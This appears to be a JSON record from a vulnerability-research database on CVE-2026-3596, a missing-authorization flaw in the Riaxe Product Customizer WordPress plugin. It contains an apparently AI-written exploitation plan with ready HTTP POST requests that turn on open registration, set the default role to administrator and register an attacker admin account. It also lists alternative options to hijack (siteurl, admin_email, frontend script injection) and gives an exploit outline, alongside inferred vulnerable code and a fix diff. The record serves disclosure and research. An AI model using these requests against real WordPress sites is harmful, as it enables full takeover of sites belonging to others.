[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fNwA4V6VPP1-Bgow0huNIhmpTJI-libTRkS2uYo-wgxY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3596","riaxe-product-customizer-missing-authorization-to-unauthenticated-arbitrary-options-update-to-privilege-escalation-via-i","Riaxe Product Customizer \u003C= 2.1.2 - Missing Authorization to Unauthenticated Arbitrary Options Update to Privilege Escalation via 'install-imprint' AJAX Action","The Riaxe Product Customizer plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.1.2. The plugin registers an unauthenticated AJAX action ('wp_ajax_nopriv_install-imprint') that maps to the ink_pd_add_option() function. This function reads 'option' and 'opt_value' from $_POST, then calls delete_option() followed by add_option() using these attacker-controlled values without any nonce verification, capability checks, or option name allowlist. This makes it possible for unauthenticated attackers to update arbitrary WordPress options, which can be leveraged for privilege escalation by enabling user registration and setting the default user role to administrator.","riaxe-product-customizer",null,"\u003C=2.1.2","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-04-15 16:45:05","2026-04-16 05:29:52",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F271a35fb-56b7-4d6b-bccc-fea1227d0913?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3596 (Riaxe Product Customizer)\n\n## 1. Vulnerability Summary\nThe **Riaxe Product Customizer** plugin for WordPress (versions \u003C= 2.1.2) contains a critical missing authorization vulnerability. The plugin registers an unauthenticated AJAX action `install-imprint` via `wp_ajax_nopriv_install-imprint`. This action is mapped to the `ink_pd_add_option()` function, which directly manipulates the WordPress `options` table. \n\nBecause the function fails to implement any capability checks, nonce verification, or an allowlist of permitted options, an unauthenticated attacker can overwrite arbitrary WordPress settings. This is most critically used for **Privilege Escalation** by enabling open registration and setting the default user role to 'administrator'.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `install-imprint` (Registered via `wp_ajax_nopriv_install-imprint`)\n- **Vulnerable Parameters**: \n    - `option`: The name of the WordPress option to update.\n    - `opt_value`: The new value for the specified option.\n- **Authentication**: Unauthenticated (accessible to any visitor).\n- **Preconditions**: The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point**: A `POST` request is sent to `admin-ajax.php` with `action=install-imprint`.\n2. **Hook Execution**: WordPress triggers the function associated with `wp_ajax_nopriv_install-imprint`.\n3. **Target Function**: `ink_pd_add_option()` (inferred from description) is called.\n4. **Input Handling**: The function reads `$_POST['option']` and `$_POST['opt_value']`.\n5. **Vulnerable Sink**:\n   - The function calls `delete_option( $_POST['option'] )`.\n   - The function calls `add_option( $_POST['option'], $_POST['opt_value'] )`.\n6. **Result**: The option in the `wp_options` table is updated to the attacker-controlled value.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the `install-imprint` action **does not perform any nonce verification**. \n- **Check Needed**: No nonce should be required for this exploitation.\n- **Bypass**: If for some reason a nonce is found to be required during the PoC, the researcher should check for `wp_localize_script` calls in the plugin source that might expose a nonce to unauthenticated users on the frontend. However, based on the CVE description, the check is entirely missing.\n\n## 5. Exploitation Strategy\nThe goal is to achieve Privilege Escalation.\n\n### Step 1: Enable User Registration\nSubmit a request to set `users_can_register` to `1`.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=install-imprint&option=users_can_register&opt_value=1\n```\n\n### Step 2: Set Default Role to Administrator\nSubmit a request to set `default_role` to `administrator`.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=install-imprint&option=default_role&opt_value=administrator\n```\n\n### Step 3: Register a New Administrator (Optional Proof)\nNavigate to the registration page and create a new account.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-login.php?action=register HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\nuser_login=attacker_admin&user_email=attacker@example.com&wp-submit=Register\n```\n\n## 6. Test Data Setup\n1. **Target Environment**: A standard WordPress installation with Riaxe Product Customizer \u003C= 2.1.2 installed.\n2. **Baseline State**:\n   - `wp option get users_can_register` should return `0`.\n   - `wp option get default_role` should return `subscriber`.\n3. **No Shortcodes Required**: Since the endpoint is unauthenticated and (reportedly) nonce-less, no specific page setup is required to trigger the vulnerability.\n\n## 7. Expected Results\n- The AJAX requests should return a successful status code (typically `200 OK` or a `1` response if `wp_die()` is used).\n- The `users_can_register` option in the database will change from `0` to `1`.\n- The `default_role` option in the database will change from `subscriber` to `administrator`.\n\n## 8. Verification Steps\nAfter sending the malicious POST requests, use WP-CLI to confirm the state change:\n\n```bash\n# Verify registration is enabled\nwp option get users_can_register\n# Expected Output: 1\n\n# Verify default role is admin\nwp option get default_role\n# Expected Output: administrator\n```\n\n## 9. Alternative Approaches\nIf updating core options is blocked by a security plugin or environment hardening, alternative high-impact options to update include:\n- `siteurl` or `home`: To perform a Denial of Service or Redirect hijack.\n- `admin_email`: To attempt password resets of existing admins.\n- `rewrite_rules`: To corrupt the site's routing.\n- `ink_pd_settings` (Plugin specific): To inject malicious JS\u002Fiframes if the plugin settings are rendered on the frontend.","The Riaxe Product Customizer plugin for WordPress is vulnerable to an unauthenticated arbitrary options update through its 'install-imprint' AJAX action. By exploiting this lack of authorization and validation, an attacker can overwrite critical WordPress settings, such as enabling open registration and setting the default user role to administrator, leading to full site takeover.","\u002F\u002F Inferred file path: riaxe-product-customizer\u002Friaxe-product-customizer.php\n\nadd_action('wp_ajax_nopriv_install-imprint', 'ink_pd_add_option');\nadd_action('wp_ajax_install-imprint', 'ink_pd_add_option');\n\nfunction ink_pd_add_option() {\n    $option_name = $_POST['option'];\n    $option_value = $_POST['opt_value'];\n    \n    \u002F\u002F Directly modifies any option without capability checks or allowlisting\n    delete_option($option_name);\n    add_option($option_name, $option_value);\n    die();\n}","--- a\u002Friaxe-product-customizer\u002Friaxe-product-customizer.php\n+++ b\u002Friaxe-product-customizer\u002Friaxe-product-customizer.php\n@@ -1,10 +1,18 @@\n-add_action('wp_ajax_nopriv_install-imprint', 'ink_pd_add_option');\n add_action('wp_ajax_install-imprint', 'ink_pd_add_option');\n \n function ink_pd_add_option() {\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_die( -1 );\n+    }\n+    check_ajax_referer( 'ink_pd_security', 'security' );\n+\n     $option_name = isset( $_POST['option'] ) ? sanitize_text_field( $_POST['option'] ) : '';\n-    $option_value = $_POST['opt_value'];\n+    $option_value = isset( $_POST['opt_value'] ) ? $_POST['opt_value'] : '';\n \n+    $allowed_options = array( 'ink_pd_custom_settings' ); \u002F\u002F Example restricted list\n+    if ( ! in_array( $option_name, $allowed_options ) ) {\n+        wp_die( 'Forbidden' );\n+    }\n+\n     delete_option($option_name);\n     add_option($option_name, $option_value);\n     die();","The exploit targets the unauthenticated AJAX endpoint 'wp_ajax_nopriv_install-imprint' which maps to the 'ink_pd_add_option' function. To achieve privilege escalation, an attacker follows these steps: 1. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the parameters action=install-imprint, option=users_can_register, and opt_value=1. This enables site registration. 2. Send a second POST request with action=install-imprint, option=default_role, and opt_value=administrator. This ensures all new registrants are granted administrative privileges. 3. Navigate to \u002Fwp-login.php?action=register and register a new account, which will automatically be assigned the 'administrator' role. No authentication or nonces are required for this exploit.","gemini-3-flash-preview","2026-04-16 15:28:21","2026-04-16 15:28:35",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Friaxe-product-customizer\u002Ftags"]